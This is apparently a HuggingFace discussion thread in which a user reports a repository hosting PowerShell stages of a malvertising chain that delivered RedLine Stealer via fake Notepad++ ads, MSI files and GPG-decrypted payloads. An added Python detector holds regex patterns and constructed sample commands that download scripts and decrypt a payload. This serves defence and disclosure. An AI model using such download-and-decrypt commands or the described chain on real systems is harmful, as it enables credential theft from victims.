🚩 Report : Malware

#1
by MrFW - opened

This Repo is being used to host PowerShell commands used by password stealing malware.
Each of the files contains parts for different payloads: after a victim downloads a freeware file from a Google Ad link, the payload reaches out to HuggingFace to grab these instructions. Each file hosted here has different content, but ultimately, they are part of malware deployment.

MrFW changed discussion title from 🚩 Report : Ethical issue(s) to 🚩 Report : Malware

we disabled the repo


@breadlicker45 I'm not sure what you are talking about. I'm not sure why you are commenting on this repository months after it was already actioned.
The only reason I found HuggingFace and this repo was because of the malicious PowerShell being executed to download additional PowerShell that was hosted here. Are you one of the attackers who used this repository?
It may be that the repository was imitating or pretending to be some other repository that you were familiar with. However, if you had seen the PowerShell before it was actioned, you would have recognized that it wasn't what you believe it to be.

MrFW changed discussion status to closed

Reporting the content here was just one of multiple steps that were taken. :)


Yeah, unfortunately, the reporting options for HuggingFace are limited, I've also complained about that.


@MrFW was this a fine-tune of a model or was this like a PowerShell file or something? I have no context on what it was btw

Yeah, so:
The attacker created look-alike domains for stuff like Notepad++ and bought Google Ads to lead to their look-alike domain.
The domain would host MSI files. The MSI files would execute PowerShell that reached out to HuggingFace to download additional commands. There were multiple PowerShell commands in series:
The PowerShell files would download GPG for Windows and a GPG-encrypted file. GPG for Windows was used to decrypt another file, which was RedLine Stealer (a program that steals passwords and cookies stored in the browser).
So this repo was hosting the PowerShell files used in that process.
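As an added defender-side example (not code from this thread or from any of its participants), the chain described above can be turned into a simple correlation check over PowerShell script-block log text (what Script Block Logging records as ScriptBlockText). The cmdlet list, the paths and the sample log lines below are constructed assumptions, not the actual commands from the reported repository.

```python
import re
from typing import Dict, List

# Indicators taken from the chain in the thread: a PowerShell stage that fetches
# further commands from huggingface.co, then fetches GPG for Windows and decrypts
# a GPG-encrypted file into the final payload. Patterns are assumptions.
FETCH_CMDLETS = r"(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Net\.WebClient|Start-BitsTransfer)"
RULES = {
    "hf_fetch": re.compile(FETCH_CMDLETS + r".*?https?://huggingface\.co/", re.I),
    "gpg_fetch": re.compile(FETCH_CMDLETS + r".*?(?:gpg4win|gnupg)", re.I),
    "gpg_decrypt": re.compile(r"gpg(?:\.exe)?['\"]?\s.*?(?:--decrypt|-d\b)", re.I),
}

# Constructed stand-ins for one host's script-block log entries (illustrative only).
SAMPLE_SCRIPT_BLOCKS = [
    "Invoke-WebRequest -Uri https://huggingface.co/EXAMPLE-USER/EXAMPLE-REPO/resolve/main/next.ps1 -OutFile $env:TEMP\\next.ps1",
    "Invoke-WebRequest -Uri https://example.invalid/gpg4win.exe -OutFile $env:TEMP\\gpg4win.exe",
    '& "C:\\Program Files (x86)\\GnuPG\\bin\\gpg.exe" --batch --decrypt -o $env:TEMP\\out.exe $env:TEMP\\payload.gpg',
    "Get-ChildItem -Path $env:USERPROFILE\\Documents | Measure-Object",  # benign activity
]


def score_session(script_blocks: List[str]) -> Dict[str, object]:
    """Evaluate the script blocks of one host/session and correlate the indicators.

    A single indicator (e.g. a download from huggingface.co) is only medium: plenty
    of legitimate tooling pulls model files. The download-then-GPG-decrypt sequence
    seen together is what makes the chain described in the thread stand out.
    """
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for idx, block in enumerate(script_blocks):
        for name, pattern in RULES.items():
            if pattern.search(block):
                hits[name].append(idx)
    matched = {name for name, idxs in hits.items() if idxs}
    if {"hf_fetch", "gpg_decrypt"} <= matched or {"gpg_fetch", "gpg_decrypt"} <= matched:
        severity = "high"  # fetch stage plus decrypt stage present on the same host
    elif matched:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "hits": {name: hits[name] for name in matched}}


if __name__ == "__main__":
    print(score_session(SAMPLE_SCRIPT_BLOCKS))
```

In practice the blocks would be grouped per host and per time window before scoring, so that the medium-severity single hits do not drown out the correlated chain.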


Oh, thanks for telling me that, I had no idea. Please disregard what I said in the past, I agree with you 100%.
